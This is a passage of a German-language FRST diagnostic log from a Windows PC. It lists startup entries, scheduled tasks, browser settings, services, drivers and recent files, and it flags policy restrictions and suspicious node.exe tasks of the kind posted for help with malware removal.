(Valve -> Valve Corporation) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe <7>
(Valve -> Valve Corporation) C:\Program Files (x86)\Steam\steam.exe

==================== Registry (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [Launch LCore] => C:\Program Files\Logitech Gaming Software\LCore.exe [18630280 2018-05-07] (Logitech Inc -> Logitech Inc.)
HKLM\...\Run: [] => [X]
HKLM-x32\...\Run: [Avira SystrayStartTrigger] => C:\Program Files (x86)\Avira\Launcher\Avira.SystrayStartTrigger.exe [704720 2020-09-22] (Avira Operations GmbH & Co. KG -> Avira Operations GmbH & Co. KG)
HKLM-x32\...\Run: [PDFPrint] => C:\Program Files (x86)\PDF24\pdf24.exe [483976 2020-09-07] (Geek Software GmbH -> Geek Software GmbH)
HKLM-x32\...\Run: [] => [X]
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Beschränkung <==== ACHTUNG
HKU\S-1-5-19\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518656 2019-12-07] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-20\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518656 2019-12-07] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-21-950702919-2450676760-769127011-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3395360 2020-09-04] (Valve -> Valve Corporation)
HKU\S-1-5-21-950702919-2450676760-769127011-1001\...\Run: [Web Companion] => C:\Program Files (x86)\Lavasoft\Web Companion\Application\WebCompanion.exe --minimize 
HKU\S-1-5-21-950702919-2450676760-769127011-1001\...\Run: [] => [X]
HKLM\...\Windows x64\Print Processors\Canon MG3100 series Print Processor: C:\Windows\System32\spool\prtprocs\x64\CNMPDAR.DLL [30208 2012-03-14] (Microsoft Windows Hardware Compatibility Publisher -> CANON INC.)
HKLM\...\Print\Monitors\Canon BJ Language Monitor MG3100 series: C:\WINDOWS\system32\CNMLMAR.DLL [385024 2012-03-14] (Microsoft Windows Hardware Compatibility Publisher -> CANON INC.)
HKLM\...\Print\Monitors\doPDF 7 Monitor: C:\WINDOWS\system32\dopdfmn7.dll [24968 2012-05-17] (Softland S.R.L. -> Softland)
GroupPolicy: Beschränkung - Chrome <==== ACHTUNG
CHR HKLM\SOFTWARE\Policies\Google: Beschränkung <==== ACHTUNG

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) ============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {1DBDDDCD-14AD-487E-8ACF-CE056D5F4854} - System32\Tasks\Microsoft\Office\Office Automatic Updates 2.0 => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [24611696 2020-09-06] (Microsoft Corporation -> Microsoft Corporation)
Task: {2385DA70-A041-4701-8B52-C7961B7F3A98} - System32\Tasks\Microsoft\Office\Office Feature Updates Logon => C:\Program Files (x86)\Microsoft Office\root\Office16\sdxhelper.exe [115056 2020-09-19] (Microsoft Corporation -> Microsoft Corporation)
Task: {2A1C14F9-707F-4D01-AC6E-11BDCD9A1678} - System32\Tasks\BackgroundActivityCaptureService_6eb8e => C:\Program Files (x86)\nodejs\node.exe [15017624 2017-05-02] (Node.js Foundation -> Node.js) <==== ACHTUNG
Task: {2ADA8C4C-7DC6-44BF-B7DE-B2A7E252858C} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [24611696 2020-09-06] (Microsoft Corporation -> Microsoft Corporation)
Task: {678A824B-D141-4938-A6F5-2B40BD531FBF} - System32\Tasks\Serial CredentialEnrollmentManagerUserSvc Avira => C:\Program Files (x86)\nodejs\node.exe [15017624 2017-05-02] (Node.js Foundation -> Node.js) <==== ACHTUNG
Task: {9176812B-D62C-4F67-9100-AAC13CB8A637} - System32\Tasks\MicrosoftEdgeUpdateTaskMachineCore => C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
Task: {942415E4-5889-4AB8-9FC8-BF49FF8BEF49} - System32\Tasks\MicrosoftEdgeUpdateTaskMachineUA => C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
Task: {A62072D1-AFCA-4A2A-A128-DC218AA6B897} - System32\Tasks\Microsoft\Office\Office Subscription Maintenance => C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonx86\Microsoft Shared\Office16\OLicenseHeartbeat.exe [1443720 2020-09-19] (Microsoft Corporation -> Microsoft Corporation)
Task: {BE6CF635-D821-429D-B9FE-9547963C0A32} - System32\Tasks\Microsoft\Office\Office Feature Updates => C:\Program Files (x86)\Microsoft Office\root\Office16\sdxhelper.exe [115056 2020-09-19] (Microsoft Corporation -> Microsoft Corporation)
Task: {CD18913A-4DA8-4CAD-950D-E23964078FAB} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [4371352 2020-07-26] (Microsoft Corporation -> Microsoft Corporation)
Task: {E2FA6682-EFFC-4607-ABBF-069123B685CF} - System32\Tasks\Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\default-browser-agent.exe [664784 2020-10-03] (Mozilla Corporation -> Mozilla Foundation)
Task: {E6606882-5426-42E7-93E6-5ECAFAA06C47} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [4371352 2020-07-26] (Microsoft Corporation -> Microsoft Corporation)

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)


==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Tcpip\Parameters: [DhcpNameServer] 192.168.2.1
Tcpip\..\Interfaces\{a94a074b-2686-4f31-bd3c-7f2aa32b5570}: [DhcpNameServer] 192.168.2.1

Edge: 
======
Edge Profile: C:\Users\Tamy\AppData\Local\Microsoft\Edge\User Data\Default [2020-08-18]

FireFox:
========
FF DefaultProfile: u5btrav7.default
FF ProfilePath: C:\Users\Tamy\AppData\Roaming\Mozilla\Firefox\Profiles\u5btrav7.default [2020-10-04]
FF user.js: detected! => C:\Users\Tamy\AppData\Roaming\Mozilla\Firefox\Profiles\u5btrav7.default\user.js [2020-10-04]
FF DownloadDir: C:\Users\Tamy\Downloads
FF Homepage: Mozilla\Firefox\Profiles\u5btrav7.default -> google.de
FF NewTab: Mozilla\Firefox\Profiles\u5btrav7.default -> hxxps://defaultsearch.co/homepage?hp=1&bitmask=9996&pId=AC191101&iDate=2020-06-08 09:40:46&bName=
FF Session Restore: Mozilla\Firefox\Profiles\u5btrav7.default -> ist aktiviert.
FF Extension: (NoScript) - C:\Users\Tamy\AppData\Roaming\Mozilla\Firefox\Profiles\u5btrav7.default\Extensions\{73a6fe31-595d-460b-a920-fcc0f8843232}.xpi [2020-09-23]
FF Extension: (Adblock Plus - kostenloser Adblocker) - C:\Users\Tamy\AppData\Roaming\Mozilla\Firefox\Profiles\u5btrav7.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2020-09-10]
FF SearchPlugin: C:\Users\Tamy\AppData\Roaming\Mozilla\Firefox\Profiles\u5btrav7.default\searchplugins\bing-lavasoft-ff59.xml [2020-08-26]
FF HKLM\...\Firefox\Extensions: [{21AAF3C3-8175-4C8D-87FD-39850D93AED5}] - C:\WINDOWS\Installer\{C194A732-C141-47B1-927A-2408A8446784}\{21AAF3C3-8175-4C8D-87FD-39850D93AED5}.xpi
FF Extension: ( ) - C:\WINDOWS\Installer\{C194A732-C141-47B1-927A-2408A8446784}\{21AAF3C3-8175-4C8D-87FD-39850D93AED5}.xpi [2020-10-04]
FF HKLM-x32\...\Firefox\Extensions: [{21AAF3C3-8175-4C8D-87FD-39850D93AED5}] - C:\WINDOWS\Installer\{C194A732-C141-47B1-927A-2408A8446784}\{21AAF3C3-8175-4C8D-87FD-39850D93AED5}.xpi
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2020-07-26] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2020-07-26] (Microsoft Corporation -> Microsoft Corporation)

Chrome: 
=======
CHR HKLM\...\Chrome\Extension: [caljgklbbfbcjjanaijlacgncafpegll]
CHR HKLM\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk]
CHR HKLM-x32\...\Chrome\Extension: [caljgklbbfbcjjanaijlacgncafpegll]
CHR HKLM-x32\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk]

==================== Dienste (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 Avira.ServiceHost; C:\Program Files (x86)\Avira\Launcher\Avira.ServiceHost.exe [640760 2020-09-22] (Avira Operations GmbH & Co. KG -> Avira Operations GmbH & Co. KG)
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [11118976 2020-09-06] (Microsoft Corporation -> Microsoft Corporation)
R2 LogiRegistryService; C:\Program Files\Logitech Gaming Software\Drivers\APOService\LogiRegistryService.exe [206472 2018-05-07] (Logitech Inc -> Logitech Inc.)
S3 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [2509104 2020-06-10] (Electronic Arts, Inc. -> Electronic Arts)
R2 Origin Web Helper Service; C:\Program Files (x86)\Origin\OriginWebHelperService.exe [3460920 2020-06-10] (Electronic Arts, Inc. -> Electronic Arts)
R2 PDF24; C:\Program Files (x86)\PDF24\pdf24.exe [483976 2020-09-07] (Geek Software GmbH -> Geek Software GmbH)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [5097896 2020-09-15] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [13172752 2020-01-22] (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [3004048 2019-12-07] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [103384 2019-12-07] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 YuLinc_AppShare_PingBack.exe; C:\Program Files (x86)\netucate\YuLinc AppShare\YuLinc_AppShare_PingBack.exe [1464320 2017-10-13] (netucate systems GmbH) [Datei ist nicht signiert]
S4 edgeupdate; "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc [X]
S4 edgeupdatem; "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /medsvc [X]

===================== Treiber (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R3 ladfGSS; C:\WINDOWS\system32\drivers\ladfGSS.sys [45168 2018-05-07] (Logitech Inc -> Logitech Inc.)
R2 LGCoreTemp; C:\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\lgcoretemp.sys [14184 2015-06-21] (Logitech -> Logitech)
R3 LGJoyXlCore; C:\WINDOWS\system32\drivers\LGJoyXlCore.sys [67736 2018-05-07] (Logitech Inc -> Logitech Inc.)
S3 logi_joy_bus_enum; C:\WINDOWS\system32\drivers\logi_joy_bus_enum.sys [38136 2020-06-08] (Logitech Inc -> Logitech)
S3 logi_joy_xlcore; C:\WINDOWS\system32\drivers\logi_joy_xlcore.sys [66808 2020-06-08] (Logitech Inc -> Logitech)
R3 MP4RecorderVAD; C:\WINDOWS\System32\drivers\mp4recordervad64.sys [38368 2017-10-13] (netucate systems GmbH -> netucate systems GmbH)
S0 WdBoot; C:\WINDOWS\System32\drivers\WdBoot.sys [46688 2019-12-07] (Microsoft Windows Early Launch Anti-Malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\WdFilter.sys [350136 2019-12-07] (Microsoft Windows -> Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [54200 2019-12-07] (Microsoft Windows -> Microsoft Corporation)

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat (erstellte) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2020-10-04 11:37 - 2020-10-04 11:37 - 000004568 _____ C:\WINDOWS\system32\Tasks\BackgroundActivityCaptureService_6eb8e
2020-10-04 11:36 - 2020-10-04 11:36 - 000001152 __RSH C:\ProgramData\ntuser.pol
2020-10-03 21:59 - 2020-10-03 22:03 - 000039027 _____ C:\Users\Tamy\Desktop\Addition.txt
2020-10-03 21:55 - 2020-10-04 11:40 - 000014606 _____ C:\Users\Tamy\Desktop\FRST.txt
2020-10-03 21:55 - 2020-10-04 11:40 - 000000000 ____D C:\FRST
2020-10-03 21:53 - 2020-10-03 21:53 - 002299392 _____ (Farbar) C:\Users\Tamy\Desktop\FRST64.exe
2020-10-03 21:29 - 2020-10-03 21:29 - 000000000 ____D C:\WINDOWS\system32\Tasks\Mozilla
2020-10-03 10:58 - 2020-10-04 11:37 - 000000000 ____D C:\Program Files\Mozilla Firefox
2020-10-03 09:59 - 2020-10-03 09:59 - 000000000 ____D C:\WINDOWS\system32\appmgmt
2020-10-03 09:57 - 2020-10-03 09:57 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VideoLAN
2020-10-03 09:57 - 2020-10-03 09:57 - 000000000 ____D C:\Program Files\VideoLAN
2020-10-02 21:49 - 2020-10-02 21:49 - 000000000 ____D C:\Users\Tamy\AppData\Local\mbam
2020-10-02 21:48 - 2020-10-02 21:48 - 000000000 ____D C:\ProgramData\Malwarebytes
2020-10-02 09:49 - 2020-10-02 10:24 - 000000000 ____D C:\Program Files (x86)\Mozilla Thunderbird
2020-09-26 15:27 - 2020-09-26 15:28 - 000000000 ____D C:\Users\Tamy\Downloads\Bilder_entwickeln
2020-09-24 10:47 - 2020-09-24 10:48 - 000000000 ____D C:\Users\Tamy\AppData\Local\Opera Software
2020-09-24 10:45 - 2020-09-24 10:48 - 000000000 ____D C:\Users\Tamy\AppData\Roaming\Opera Software
2020-09-23 19:00 - 2020-09-23 19:00 - 000001035 _____ C:\Users\Public\Desktop\Pixum Fotowelt.lnk
2020-09-23 19:00 - 2020-09-23 19:00 - 000001035 _____ C:\ProgramData\Desktop\Pixum Fotowelt.lnk
2020-09-23 19:00 - 2020-09-23 19:00 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Pixum Fotowelt
2020-09-23 18:55 - 2020-09-23 18:55 - 000000000 ____D C:\Users\Tamy\AppData\Roaming\hps-install
2020-09-23 15:51 - 2020-09-23 15:51 - 000001153 _____ C:\Users\Public\Desktop\PDF24.lnk
2020-09-23 15:51 - 2020-09-23 15:51 - 000001153 _____ C:\ProgramData\Desktop\PDF24.lnk
2020-09-23 15:51 - 2020-09-23 15:51 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PDF24
2020-09-23 15:35 - 2020-09-23 15:35 - 000001193 _____ C:\Users\Public\Desktop\Avira.lnk
2020-09-23 15:35 - 2020-09-23 15:35 - 000001193 _____ C:\ProgramData\Desktop\Avira.lnk
2020-09-23 15:35 - 2020-09-23 15:35 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avira
2020-09-15 17:45 - 2020-09-15 17:45 - 004820992 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdp.dll
2020-09-15 17:45 - 2020-09-15 17:45 - 004274688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cdp.dll
2020-09-15 17:45 - 2020-09-15 17:45 - 003992576 _____ (Microsoft Corporation) C:\WINDOWS\system32\bootux.dll
2020-09-15 17:45 - 2020-09-15 17:45 - 000975872 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll
2020-09-15 17:45 - 2020-09-15 17:45 - 000966144 _____ (Microsoft Corporation) C:\WINDOWS\system32\WFS.exe
2020-09-15 17:45 - 2020-09-15 17:45 - 000749056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fveapi.dll
2020-09-15 17:45 - 2020-09-15 17:45 - 000669696 _____ (Microsoft Corporation) C:\WINDOWS\system32\WFSR.dll
2020-09-15 17:45 - 2020-09-15 17:45 - 000515072 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinBioDataModel.dll
2020-09-15 17:45 - 2020-09-15 17:45 - 000478208 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Picker.dll
2020-09-15 17:45 - 2020-09-15 17:45 - 000434688 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapibase.dll
2020-09-15 17:45 - 2020-09-15 17:45 - 000432128 _____ (Microsoft Corporation) C:\WINDOWS\system32\FXSCOMPOSE.dll
2020-09-15 17:45 - 2020-09-15 17:45 - 000388096 _____ (Microsoft Corporation) C:\WINDOWS\system32\syncutil.dll
2020-09-15 17:45 - 2020-09-15 17:45 - 000361984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fveapibase.dll
2020-09-15 17:45 - 2020-09-15 17:45 - 000304640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\syncutil.dll
2020-09-15 17:45 - 2020-09-15 17:45 - 000248320 _____ (Microsoft Corporation) C:\WINDOWS\system32\FXSCOVER.exe
2020-09-15 17:45 - 2020-09-15 17:45 - 000202240 _____ (Microsoft Corporation) C:\WINDOWS\system32\notepad.exe
2020-09-15 17:45 - 2020-09-15 17:45 - 000202240 _____ (Microsoft Corporation) C:\WINDOWS\notepad.exe
2020-09-15 17:45 - 2020-09-15 17:45 - 000185344 _____ (Microsoft Corporation) C:\WINDOWS\system32\FXSUTILITY.dll
2020-09-15 17:45 - 2020-09-15 17:45 - 000180224 _____ (Microsoft Corporation) C:\WINDOWS\system32\msrahc.dll
2020-09-15 17:45 - 2020-09-15 17:45 - 000035328 _____ (Microsoft Corporation) C:\WINDOWS\system32\FXSCOMPOSERES.dll
2020-09-15 17:45 - 2020-09-15 17:45 - 000026624 _____ (Microsoft Corporation) C:\WINDOWS\system32\bootim.exe
2020-09-15 17:44 - 2020-09-15 17:44 - 032610752 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecsRaw.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 031598936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecsRaw.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 024264704 _____ (Microsoft Corporation) C:\WINDOWS\system32\Hydrogen.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 019869696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 018766848 _____ (Microsoft Corporation) C:\WINDOWS\system32\HologramWorld.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 018075136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 006417408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 005820416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 004783344 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 004362816 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Mirage.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 004304384 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 003868672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 003659264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 003547784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfcore.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 003334656 _____ (Microsoft Corporation) C:\WINDOWS\system32\msi.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 002687488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msi.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 002519512 _____ (Microsoft Corporation) C:\WINDOWS\system32\msmpeg2vdec.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 002452856 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMVCORE.DLL
2020-09-15 17:44 - 2020-09-15 17:44 - 002383672 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft.Uev.AppAgent.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 002338184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msmpeg2vdec.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 002200576 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft.Uev.ModernAppAgent.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 002136744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMVCORE.DLL
2020-09-15 17:44 - 2020-09-15 17:44 - 002021192 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntSubsystems64.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 001980728 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsp_fs.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 001956032 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfasfsrcsnk.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 001812368 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfplat.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 001770040 _____ (Microsoft Corporation) C:\WINDOWS\system32\winmde.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 001719096 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsp_health.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 001632056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Microsoft.Uev.AppAgent.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 001588016 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntVirtualization.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 001542752 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsvr.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 001541224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfplat.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 001506608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsp_fs.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 001502016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppVEntSubsystems32.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 001438432 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvproc.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 001438008 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVIntegration.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 001411072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mmc.exe
2020-09-15 17:44 - 2020-09-15 17:44 - 001352232 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmpeg2srcsnk.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 001337344 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Audio.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 001314608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsp_health.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 001313792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msjet40.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 001301584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfasfsrcsnk.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 001260200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvproc.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 001259320 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntSubsystemController.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 001253376 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMSPDMOE.DLL
2020-09-15 17:44 - 2020-09-15 17:44 - 001239040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Audio.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 001201152 _____ (Microsoft Corporation) C:\WINDOWS\system32\AgentService.exe
2020-09-15 17:44 - 2020-09-15 17:44 - 001198592 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft.Uev.CommonBridge.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 001183256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsvr.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 001138176 _____ (Microsoft Corporation) C:\WINDOWS\system32\ApplySettingsTemplateCatalog.exe
2020-09-15 17:44 - 2020-09-15 17:44 - 001117344 _____ (Microsoft Corporation) C:\WINDOWS\system32\DolbyDecMFT.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 001061376 _____ (Microsoft Corporation) C:\WINDOWS\system32\opengl32.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 001048064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMSPDMOE.DLL
2020-09-15 17:44 - 2020-09-15 17:44 - 001014864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmpeg2srcsnk.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000969544 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVPolicy.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000961192 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfds.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000946712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DolbyDecMFT.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000921088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\opengl32.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000894264 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVManifest.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000859136 _____ (Microsoft Corporation) C:\WINDOWS\system32\assignedaccessmanagersvc.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000819200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\clusapi.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000784896 _____ (Microsoft Corporation) C:\WINDOWS\system32\nshwfp.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000770560 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft.Uev.PrinterCustomActions.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000759792 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMADMOD.DLL
2020-09-15 17:44 - 2020-09-15 17:44 - 000753664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft.Uev.Office2013CustomActions.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000747320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfds.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000744240 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMADMOE.DLL
2020-09-15 17:44 - 2020-09-15 17:44 - 000739128 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVOrchestration.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000736056 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntStreamingManager.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000680664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMADMOE.DLL
2020-09-15 17:44 - 2020-09-15 17:44 - 000677888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rdvgogl32.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000668472 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVReporting.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000665264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMADMOD.DLL
2020-09-15 17:44 - 2020-09-15 17:44 - 000611840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\nshwfp.dll
